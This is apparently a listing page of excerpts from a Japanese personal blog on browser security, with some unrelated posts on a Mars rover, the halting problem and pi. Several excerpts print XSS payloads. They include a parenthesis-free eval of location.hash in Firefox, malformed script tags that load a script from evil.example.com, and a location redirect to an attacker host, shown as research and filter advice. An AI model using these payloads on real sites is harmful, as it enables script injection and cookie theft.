詰めXSS回答第弐回(分割方式) - hoshikuzu | star_dust の書斎
続きです。Firefoxにおいては、注入するスクリプト断片に「()」を含まないようにしながら関数の実行が可能です。まず簡単のために、詰めXSS出題時に比べて制限をゆるめてみます。とりあえずalert(1)をしてみようとするものです。 <script> a setter = alert a = 1 </script> 上記でalert(1)が実行されます。この記法は、Firefoxの初期の実装でして、setter や getter の古い書き方です。また、既に廃止予定の記述方法です。近い将来無効になるかもしれません。 さて、さらに、location.hashがスクリプト注入時のペイロードになっているケースを想定してみましょう。Firefox3.0.11 で確認済みです。 <script> u setter = unescape e setter = eval e = u = location
JSONデータをクロスドメインアタックから守るためにwhile(1)を使うことをやめましょう - hoshikuzu | star_dust の書斎
これはなに 既にご存知の方がいらっしゃるかどうかも知りませんが今さっき関連文献に行き当たって驚愕したので念のためにメモを書いておきます。私はメーリングリストなどに加入していませんので論議が済んでいるかどうかも知らないのです。もしもウェブ上に解説記事があるようでしたら逆に私に是非とも教えてください。 JSONデータの先頭に JSONデータの先頭にwhile(1)を置いておくことで無限ループを発生させておいて、受動的攻撃のページの悪意あるscriptの実行を失敗させるというアイデアには欠点があるということを、先程とある文献から知りました。これはwhile(true)についても同様です。JavaScriptは柔軟で強力な言語ですから、ブラウザがJavaScriptエンジンをまじめに実装しているのであれば、アタックのチャンスを与えていることになります。しかしこれはブラウザの脆弱性とは捉えられません
火星に到着したスピリッツの探索機が密かに仕組まれたバックドアのおかげで息を吹き返したオハナシ
素敵だ・・・ 火星着陸時の衝撃で地上探索機搭載のコンピュータのフラッシュメモリのファイルシステムが壊れたのでOS再起動の永遠の繰り返しになってしまった。起動するとフラッシュメモリのエラー検知をして再起動・・・。地球からのコマンド送信しての通常の初期化起動も無効になるし万が一のための最低限モードによる起動指示もきかない。対策のために何日も全スタッフは24時間苦しんだんだって。ところで起動ってエネルギー食べちゃうんだよね。起動直後にそれまでの活動履歴を地球に送信する仕組みなんだけど電波出し始めて履歴がはいっているフラッシュメモリの中身を検索すると落ちる。これの繰り返し。クソデータにみちた電波のたれながしが繰り返されてエネルギーが減っていく・・・そうこうしているうちに太陽光による発電とバッテリーとのつりあいがとれなくなってエネルギーの完全な不足になり瀕死状態に。極寒の夜がくれば耐えられないかもし
locationでページ遷移を指示しておきながら直後にtime系でナニカするアレ 2008-06-29 - hoshikuzu | star_dust の書斎
…いろんなブラウザで変な現象が起きるので前から注目していたのですが、まさかIEで外部ドメインのcookieが取れてしまうとは…調査の深さが足りなかったなぁ>俺 locationでページ遷移したらバシっと処理をぶった切ってほしいかも>諸ブラウザ ええと、なんでもいいけど、なにかしらポップアップする系と併せてぐしゃぐしゃすると変な競合が起こりやすい模様。というのが今までの私の見解。 一番笑ったのが、AページでBページへのリンクを踏んだ後Bページを表示後、Aページへ戻りますか?という選択肢(Aページ内のスクリプト)を出させることが可能とか。名づけて、ちょっと見たらスグに戻ってきてねリンク。でもcookieは取ってこれなかったんだよねぇ。コレ。 ドブロイ波の公式を実験的事実とみなし、古典的な実波動関数をあきらめて、複素波動であると決め付けて、満たすべき波動方程式を求めるとシュレーディンガー方程式が
hoshikuzu | star_dust の書斎 - 2007-09-18 IEではHTMLのコメントにスタイルを付加できるらしい
バージョン Firefoxの1.508ぐらいの古いもので考えてみました。 background:url("javascript:ほえほえ") background:url("javascript:ほえほえ");Firefoxでは上記のようなスタイル記述をほどこしたbody要素内の各要素で、ほえほえを安易に書いたときに、documentオブジェクトには手が出せません。つまりcookieを単純に盗み出すことが出来ないのかもしれません。権限がないというエラーメッセージが出るのです。また、JavaScriptの組み込み関数も利用できません。alert()とか。XSSされにくい感じです。windowオブジェクトにも制限がかかっているかもしれません。 でもでもでも locationオブジェクトそのものに値を設定はできます。 location="attacker.example.com";これでURLの
interNet POLICE 警察庁 インターネット安全・安心相談 過去にあった脆弱性の件 - hoshikuzu | star_dust の書斎
interNet POLICE 警察庁 インターネット安全・安心相談 のページ ここには過去にXSS脆弱性があり、IPAさんに報告しておりました。 さきごろ取り扱い終了になったもようです。 最近、私は、自称ネット難民ですので、なかなかインターネットに接続できなかったこともあり、残念ながら今日になって、あれれ?と思いまして経過報告を日記にて行うこととしました。 2005年06月17日 警察庁 インターネット安全・安心相談のサイトが立ち上がったばかりでした。IPAさんに最初の脆弱性報告をしました。正式のものではありません。以下のような文面でした。自分で発見した脆弱性ではないこともあり、手抜きしていますし、口調がぞんざいです(恥)。失礼しました。 IPA脆弱性窓口御中 いつもお世話になっております。 私宛に匿名で(どうもproxyを使ってWebサービスの 「この商品をお友達に紹介」の伝言部分でコ
hoshikuzu | star_dust の書斎 むぅIPでなんか弾いていませんが
ほほう。もうすぐ人間なのか機械なのか判別しにくくなってくるのかも。エログリッドコンピューティングをAIでやらせるようなものなのか(激しく違う) Breaking CAPTCHAs with NNs::Radium Software Development CAPTCHA 破りの工程は,画像から文字を1文字づつ切り出す「分割」 (segmentation) の段階と,切り出した文字を1文字ごとに解析する「認識」 (recognition) の段階から構成されるが、このうちコンピュータにとって困難なのは「分割」の方であり,「認識」は比較的容易であるとされる。この研究は,その「容易さ」を人間との比較を行うことによって明らかにしたものである。 ここで驚くべきは,「認識」に絞って比較した場合,人間よりもコンピュータの方が高い認識率を持つという結果が導き出されている点である。つまり,「認識」に限って言
hoshikuzu | star_dust の書斎 - XSS模擬アタック出題編
<SCRIPT/!#$%&()*~+-_.,:;?@[/|\]^`=''SRC!#$%&()*~+-_.,:;?@[/|\]^`='http://evil.example.com/xss.js'></SCRIPT>こんな畸形例がFirefoxで通るらしい。"<SCRIPT\s" != "<SCRIPT/XSS\s" とかどころじゃないので正しくフィルタリングしようねというお話し、ということでいいのかな? Rsnake氏、FirefoxのHTML parser を読んで発見したらしい。 <SCRIPT/=''SRC='http://evil.example.com/xss.js'></SCRIPT>ちなみに上は前から時々気になっていた畸形例。IE,FF,O9で作動。実用性がほんのちょっとだけあるけど出番はめったにない。 遊びでCGIを作りました。XSS脆弱性があります。模擬アタックをかけてみ
■ - hoshikuzu | star_dust の書斎
■開発者の為の正しいCSRF対策 開発者の為の正しいCSRF対策::金床さん 自称HTTPオタクで、Guardian@JUMPERZ.NET を開発・提供している金床さんが、渾身の力を込めてCSRF対策を発表。 なんかリンク着てたんで気がつきました。ぺこり>金床さん。 上の金床さんの文書は生きている文書です。死んだ文書ではなく、訂正がばんばんはいるかもです。そのために、MLまで立ち上げていますね、凄いや。名前の由来は…うししし。 Sea Surfers ML http://www.freeml.com/ctrl/html/MLInfoForm/seasurfers@freeml.com Gmailでも加入できるんだろうか…このML… 主な内容は以下に あらゆる機能がターゲットとなりうる ひとつの機能は2画面で構成される 「CSRF以前の問題」については考えない CSSXSS脆弱性を無視しな
■ - hoshikuzu | star_dust の書斎
■Gmailモバイル版のメディア型がapplication/xhtml+xmlであった Gmailモバイル版(ログインの為のユーザ名とパスワードをPCに保存の時に…) http://m.gmail.com/ 2ヶ月ぐらい前に調べた時にはIE6でもアクセスできたのですがねぇ。ある意味正しい方向なので支持しますが。こんな感じ。 HTTP/1.1 200 OK Cache-control: no-cache Pragma: no-cache Content-Type: application/xhtml+xml; charset=utf-8 Set-Cookie: GMAIL_AT=げふんげふん; Path=/mail <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobi
■ - hoshikuzu | star_dust の書斎
■はてなダイアリー本体のXSS脆弱性 background 属性の XSS 脆弱性について::はてなダイアリー日記 あれ?いつからはてなダイアリーではHTMLの意味でのbackground属性が使えるようになったのでしょう。background属性でXSS脆弱性が発見されたようですけれど。 はてなダイアリーはHTML4.01を採用しています。background属性はbody要素でのみ有効なはず。はてなダイアリーでは当初、background属性など許可されていなかったはずです。だって、スタイルシートが使えるのが売りですしね。background属性など必要ないでしょう。悲しみながら調べてみます。 更新履歴-はてなダイアリー利用可能タグとは::はてなダイアリー 更新履歴-はてなダイアリー利用可能タグとは::はてなダイアリーから引用すると、どうも以下のようです。 ■更新履歴 (snip) 利
■ - hoshikuzu | star_dust の書斎
■はてなダイアリー日記 - スタイルシートにおけるXSS脆弱性の修正について はてなからの発表 スタイルシートにおけるXSS脆弱性の修正について - はてなダイアリー日記 上記からちょっと引用。強調部分は私によります。 はてなダイアリーのスタイルシート設定では、セキュリティ確保のため expression 関数は使用できないよう制限を設けさせていただいておりますが、一部ブラウザで、全角文字を利用すると expression 関数を実行できてしまう脆弱性が見つかりましたので、対応を行いました。 2006年1月6日追記:この問題の報告者さん発見 おお!はてなダイアリー日記 - スタイルシートにおけるXSS脆弱性の修正について :: ぷろじぇくと、みすじら。 まぁなんにしても、危険なものを取り除いてして安全なものだけ利用できるようにするというのは難しいことだなーと改めて思ったのでした。 激しく同
■ - hoshikuzu | star_dust の書斎
■チューリングマシンの停止問題(R指定?) 全てのコンピューターは、数学的に厳密に定義されているチューリングマシンでエミュレートできます。コンピューターの必要最低限の仕組みです。恐ろしく簡単な仕組みなので興味のある方はお調べ下さい。テープを読み込んだり穿孔したりするヘッダがテープ上を動き回るような感じとでも言うのでしょうか。ヘッダにはあらかじめテープの状況に対してテープ上をどのように動くか、テープから何を読み取るか(穿孔するか)という規則の集合=プログラムが入っています。ええとこの説明は多少間違っているのですがお許し下さい。 さて動き始めたヘッダが止まることを考えたりするチューリングマシンの停止問題って結構深いものがあって、例えば『汎用的に使える、プログラムソースを入力し、調べてみてバグがなければ停止する、さもなければ永久ループする』ような夢のようなチューリングマシンが作れるのかという問題
Google Desktopの情報が盗まれる恐れ…というかGoogleばかりでないです
■IE:新手法CSSXSS、Google Desktopの情報が盗まれる恐れ…というかGoogleばかりでないです、ヤバイのは、こりゃ参りましたね。 2006-01-30 追記:2006年01月20日付けで以下の状態です。マイクロソフト社からの言明です。 有用な情報を適切な方法でご連絡いただき大変感謝いたしておりますが、Web サイト側での対応が困難である事が判明し、また、Internet Explorer の脆弱性が近々対応できる見込みであるため、Internet Explorer の修正により、この問題に対応する方向で作業を進めております。 (snip) また、この問題の根幹となります Internet Explorer の脆弱性については、現在鋭意対応中でございますが、こちらのリリース時期につきましては、詳細をお伝えすることができません。 誠に申し訳ございませんが、何卒ご理解とお客様
■ - hoshikuzu | star_dust の書斎
■【土曜日、日焼けサロンイコウゼ。】 というのがはやっているのかな? 関係ないけど総理は【月曜日、靖国にイコウゼ】状態です。テレビで持ちきりです。ええと既に外務省のエライ人が中国に釈明に行っている模様です。 ■昨日やり残したIPAへの報告は順延に 再現方法を忘れている…orz18日追記:夢見でぼんやりと。http://example.com/ほえほえ/任意の文字列の挿入/%2E%2E/ぼげぼげ/…だったような気がしてきた。後で確認しましょう。確か、ばけらさんのサイトでみかけたような気がしてきました。 ■本日のIPAへの報告 Googleでニュース検索をしていたら古典的なXSS脆弱性がありそうだと匂わせる画面にぶつかりました。いえ、単に404なのですけどオウム返しっぽい。といいますか、Googleから飛んだら画面がおかしくなったダケですけど。ちょっと考えてサックリ検証。IPAさんに報告しまし
■ - hoshikuzu | star_dust の書斎
■全く今までになかった発想のモーター ベネラジャパンの新モーターいよいよ事業化へ 逆起電力なし逆トルクなしコギングレスの新モーター。超省エネ実現だぁ。 プレスリリース 日本ファーネスとアクスル、 トランス技術を応用した新しいファンモーター/エネルギー変換効率約98% 高エネルギー効率「リングモーター」の専用実施権を共同取得 〜扇風機、換気扇などへの応用を皮切りに本格的な事業化へ〜 http://www.axle-group.com/press/pressdatail/ring.pdf http://release.nikkei.co.jp/print.cfm?relID=105234 動画:WBS -トレンドたまご- 2004年11月8日放送内容 省エネ扇風機 商品名:リングモーター http://www.tv-tokyo.co.jp/wbs/2004/11/08/toretama/tt.
■ - hoshikuzu | star_dust の書斎
■尼崎列車事故考察 本記事について 時折メールにて意見交換をしている藤若亜子さんから尼崎列車事故の原因についての考察を頂きました。極めて興味深い内容です。そこで亜子さんの御許可を頂きましたので以下に全文転載をいたします。なお、hoshikuzu、ただ今眼精疲労による激しい疼痛を抱えておりまして、モニターを見るのも辛く、HTMLで正しくマークアップを行っていないことをお許し下さい。当面pre要素にて囲うだけです。いずれ回復した折にひそかに修正したいと思っております。 藤若亜子さんからのメール:件名:高校生にもできる最低限の検証 件名:高校生にもできる最低限の検証 尼崎の列車事故について、真実が知りたいと思いました。 おぼつかない手計算を少々してみたところ、速度超過は車両転倒の主原因ではないよ うに思われました。以下はその考察のプロセスです。 【R300で転倒する速度について】 (データ) 重
■ - hoshikuzu | star_dust の書斎
■円周率を求める冴えたやり方 [結] 中間数(mediant)を使った、小数の既約分数表現 - 結城浩の日記を拝読して 思い出したことを書いてみます。 与えられた小数を表現する既約分数を見つけるプログラムとその実行結果が書いて あります。中でも円周率を与えた時の実行結果を見るにつけ、あらためて思い出しまし た。22/7 と 355/113 は、その周辺に比べて突出して精度が高いのですよね。 22/7 や 355/113 を円周率としましょう、という提案は歴史的にも有名であるはずです。 アドリアン・メティウス(1527〜1607)は、355/113 を発見していますし、祖沖之 (そちゅうし 429〜500)も同様に 355/113 を発見しています。この辺の事情は、 π の不思議 に詳しく載っています。アルキメデスは 223/71 を発見していますがこれも結城浩さんの 実行結果の表にのってい
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
2005-08-17